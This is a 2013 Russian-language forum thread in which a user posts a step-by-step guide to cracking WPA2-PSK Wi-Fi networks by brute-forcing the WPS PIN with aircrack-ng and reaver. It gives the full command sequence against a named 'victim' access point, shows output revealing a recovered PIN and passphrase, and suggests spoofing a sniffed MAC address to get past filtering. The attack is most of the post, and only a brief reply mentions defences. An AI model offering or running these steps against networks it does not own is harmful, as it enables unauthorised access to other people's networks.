*Drive*- Здесь рулят padonki https://drivesource.ru/ |
|
Взлом Wi-Fi WPA2-PSK за сутки или взлом WPS https://drivesource.ru/viewtopic.php?f=15&t=1513 |
Страница 1 из 1 |
Автор: | Padonak [ 26 окт 2013, 20:33 ] |
Заголовок сообщения: | Взлом Wi-Fi WPA2-PSK за сутки или взлом WPS |
Сейчас я покажу как взломать практически любую точку доступа или роутер Wi-Fi с типом шифрования WPA2-PSK менее чем за сутки: До недавнего времени единственным способом как взломать Wi-Fi сеть с шифрованием WPA2-PSK был перебор всех возможных комбинаций пароля, либо атака по словарю, но для этого еще нужно было заполучить handshake с точки доступа. Процесс перебора занимает от нескольких часов до столетий, все зависит от сложности пароля и вычислительных мощностей взломщика. Например пароль вида Y3tAn0th (верхний, нижний регистр, цифры) на стандартном ПК с современным GPU (70000 вариантов в секунду ) подбирался бы 101 год. Но недавно нашли уязвимость, позволяющую найти ключ доступа менее чем за сутки, на моей системе и роутере D-link Dir-320 процесс занял 10 часов 40 минут. Лазейка обнаружилась в способе взломать WPS (Wi-Fi Protected Setup), это когда подключение к точке доступа осуществляется по 8-значному цифрому PIN-коду, который гораздо легче подобрать, причем данная фича включена по умолчанию на многих роутерах, включая популярные D-link Dir-615 и Dir-320 ! Подготовка взлома WPS И так, для начала установим нужный софт, нам понадобиться: aircrack-ng reaver-wps Все описанное будем проделывать в Ubuntu, либо можно использвать дистрибутив BackTrack 5, в репозиториях которого уже есть нужный софт. А для Ubuntu подключить репозитории BackTrack: Код: vim /etc/apt/sources.list Добавим в конец файла следующее: Код: # Repository Backtrack deb http://all.repository.backtrack-linux.org deb http://all.repository.backtrack-linux.org revolution main microverse non-free testing deb http://32.repository.backtrack-linux.org revolution main microverse non-free testing deb http://source.repository.backtrack-linux.org revolution main microverse non-free testing Экспортируем ключ безопастности репозитория: Код: wget -q http://all.repository.backtrack-linux.org/backtrack.gpg -O- | sudo apt-key add - И обновим списки пакетов: Код: apt-get update Ставим пакеты: Код: apt-get install aircrack-ng reaver Взлом WPS: Так как взломать Wi-Fi сеть WPA2-PSK ? Переведем нашу карту в monitor mode Код: airmon-ng start wlan0 Должно быть примерное так: Цитата: Interface Chipset Driver wlan0 Ralink 2561 PCI rt61pci - [phy0] (monitor mode enabled on mon0) Теперь найдем жертву Код: airodump-ng mon0 Будет список доступных сетей: Цитата: CH 5 ][ Elapsed: 12 s ][ 2012-05-17 16:45 BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID 1C:BD:B9:B5:C6:B9 -58 6 0 0 2 54 WPA2 TKIP PSK iformula.ru 193.240 BSSID STATION PWR Rate Lost Packets Probes Проверим, включен ли WPS на точке Код: wash -i mon0 Начинаем перебор: Код: reaver -i mon0 -b 1C:BD:B9:B5:C6:B9 -a -vv Где mon0 - имя виртуального интерфейса, далее мак адресс точки. -а - автоматически определять параметры взлома. -vv - диагностические сообщения В результате пошел перебор пинов: Цитата: Reaver v1.4 WiFi Protected Setup Attack Tool Copyright (c) 2011, Tactical Network Solutions, Craig Heffner cheffner@tacnetsol.com [+] Waiting for beacon from 1C:BD:B9:B5:C6:B9 [+] Switching mon0 to channel 1 [+] Switching mon0 to channel 2 [+] Associated with 1C:BD:B9:B5:C6:B9 (ESSID: iformula.ru 193.240) [+] Trying pin 12345670 В конечном итоге : Цитата: [+] WPS PIN: '80369424' [+] WPA PSK: 'TryT0H4CkMe' [+] AP SSID: 'iformula.ru 193.240' видим как взлом Wi-Fi сети WPA2 успешно заверен. Особо любознательные могут усовершенствовать перебор и сократить его время, изучив все возможности reaver: Код: reaver -h Возможные проблемы: - не появляется mon0 интерфейс: карточка или драйвер не поддерживают monitor mode - В лог сыпятся строки [!] WARNING: Receive timeout occured: какая то проблема с wi-fi картой, причину я не смог найти, просто использовал другой адаптер. - В логе [!] WARNING : Fialed to associate with XX:XX:XX:XX:XX:XX (ESSID: d-link) : на точке включена фильтрация по мак адресам. нужно сниферить нужный мак и ставить его себе. (airodump-ng) Дополнительно: Данный материал предназначен только в целях научного интереса и восстановления своего забытого пароля. Соблюдайте законодательство РФ. |
Автор: | Pantelemon [ 26 окт 2013, 21:53 ] |
Заголовок сообщения: | Re: Взлом Wi-Fi WPA2-PSK за сутки или взлом WPS |
Как с этим бороться? |
Автор: | Padonak [ 26 окт 2013, 23:18 ] |
Заголовок сообщения: | Re: Взлом Wi-Fi WPA2-PSK за сутки или взлом WPS |
Отключать WPS , прописывать МАС адреса разрешённые... |
Страница 1 из 1 | Часовой пояс: UTC + 3 часа [ Летнее время ] |
Powered by phpBB® Forum Software © phpBB Group http://www.phpbb.com/ |